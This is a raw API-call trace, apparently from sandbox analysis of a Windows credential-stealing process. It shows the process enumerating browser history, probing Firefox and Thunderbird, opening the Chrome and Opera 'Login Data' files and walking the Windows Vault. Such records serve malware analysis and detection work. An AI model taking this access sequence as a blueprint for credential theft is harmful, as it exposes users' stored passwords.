returned 0x0 [0280.395] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.396] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.396] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.396] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.396] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.397] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.397] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.397] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.397] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.397] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.398] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.398] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.398] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.399] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.399] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.403] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.403] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.403] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.404] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.404] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.404] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.405] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.405] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.405] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.406] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.406] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.406] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.406] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.407] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.407] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.407] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.408] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.408] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.408] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.408] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.408] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.408] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.408] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.409] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.409] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.409] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.409] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.409] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.410] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.410] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.410] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.410] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.414] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.414] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.414] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.414] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.414] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.414] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.415] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.415] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.415] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.415] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.415] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.415] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.416] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.416] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.416] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.416] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.416] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.416] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.417] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.417] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.417] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.417] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.417] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.418] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.418] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.418] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.418] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.418] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.418] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.419] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.419] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.419] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x1) returned 0x0 [0280.422] IEnumSTATURL:Next (in: This=0x59aff0, celt=0x1, rgelt=0xddaf8, pceltFetched=0xddb40*=0x1 | out: rgelt=0xddaf8, pceltFetched=0xddb40*=0x0) returned 0x1 [0280.423] IUnknown:Release (This=0x59aff0) returned 0x0 [0280.424] IUnknown:Release (This=0x5c54b8) returned 0x1 [0280.424] CoUninitialize () [0280.444] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xddb6c, Length=0x800, ResultLength=0xdea24 | out: KeyValueInformation=0xddb6c, ResultLength=0xdea24) returned 0x8000001a [0280.444] NtClose (Handle=0x254) returned 0x0 [0280.456] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x7dbd020) returned 1 [0280.474] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x7374) returned 0x5e4490 [0280.475] NtCreateKey (in: KeyHandle=0xde988, DesiredAccess=0x20219, ObjectAttributes=0xde800*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Mozilla\\Mozilla Firefox\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde988*=0x0) returned 0xc0000022 [0280.477] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0xde538 | out: Value="C:\\Program Files (x86)") returned 0x0 [0280.477] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", NtPathName=0xde50c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0280.477] NtCreateFile (in: FileHandle=0xde52c, DesiredAccess=0x120089, ObjectAttributes=0xde4f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde514, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde52c*=0x0, IoStatusBlock=0xde514*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0280.478] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5db4e0) returned 1 [0280.478] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtPathName=0xde50c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0280.478] NtCreateFile (in: FileHandle=0xde52c, DesiredAccess=0x120089, ObjectAttributes=0xde4f4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde514, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde52c*=0x0, IoStatusBlock=0xde514*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0280.478] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5cf9b0) returned 1 [0280.478] NtCreateKey (in: KeyHandle=0xde980, DesiredAccess=0x20219, ObjectAttributes=0xde7f8*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Mozilla\\Mozilla Thunderbird\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde980*=0x0) returned 0xc0000022 [0280.479] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0xde530 | out: Value="C:\\Program Files (x86)") returned 0x0 [0280.479] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", NtPathName=0xde504, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0280.479] NtCreateFile (in: FileHandle=0xde524, DesiredAccess=0x120089, ObjectAttributes=0xde4ec*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde50c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde524*=0x0, IoStatusBlock=0xde50c*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0280.479] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5db4e0) returned 1 [0280.479] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtPathName=0xde504, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0280.480] NtCreateFile (in: FileHandle=0xde524, DesiredAccess=0x120089, ObjectAttributes=0xde4ec*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde50c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde524*=0x0, IoStatusBlock=0xde50c*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0280.480] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5cf160) returned 1 [0280.480] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5e4490) returned 1 [0280.482] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="LOCALAPPDATA", Value=0xde5e8 | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0280.482] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", NtPathName=0xde5bc, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0280.483] NtCreateFile (in: FileHandle=0xde5dc, DesiredAccess=0x120089, ObjectAttributes=0xde5a4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde5c4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde5dc*=0x0, IoStatusBlock=0xde5c4*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0280.483] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ce300) returned 1 [0280.483] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xde538 | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0280.483] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", NtPathName=0xde51c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0280.483] NtCreateFile (in: FileHandle=0xde53c, DesiredAccess=0x120089, ObjectAttributes=0xde504*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde524, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde53c*=0x0, IoStatusBlock=0xde524*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0280.483] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5cdf90) returned 1 [0280.483] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="vaultcli.dll", BaseAddress=0xde760 | out: BaseAddress=0xde760*=0x6ea80000) returned 0x0 [0280.501] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0xde630, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0280.501] NtCreateFile (in: FileHandle=0xde650, DesiredAccess=0x120089, ObjectAttributes=0xde618*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde638, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde650*=0x0, IoStatusBlock=0xde638*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0280.501] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5e06a0) returned 1 [0280.501] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0xde648, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0280.501] NtCreateFile (in: FileHandle=0xde668, DesiredAccess=0x12019f, ObjectAttributes=0xde630*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde650, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde668*=0x3ac, IoStatusBlock=0xde650*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0280.502] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5e08c0) returned 1 [0280.502] NtQueryInformationFile (in: FileHandle=0x3ac, IoStatusBlock=0xde650, FileInformation=0xde5a8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xde650, FileInformation=0xde5a8) returned 0x0 [0280.502] NtWriteFile (in: FileHandle=0x3ac, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xde650, Buffer=0x58c868*, Length=0x28, ByteOffset=0xde5c0*=0, Key=0x0 | out: IoStatusBlock=0xde650, Buffer=0x58c868*) returned 0x0 [0280.504] NtClose (Handle=0x3ac) returned 0x0 [0280.506] VaultEnumerateVaults () returned 0x0 [0280.511] VaultOpenVault () returned 0x0 [0280.512] VaultEnumerateItems () returned 0x0 [0280.513] VaultFree () returned 0x0 [0280.513] VaultCloseVault () returned 0x0 [0280.513] VaultOpenVault () returned 0x0 [0280.514] VaultEnumerateItems () returned 0x0 [0280.520] VaultFree () returned 0x0 [0280.520] 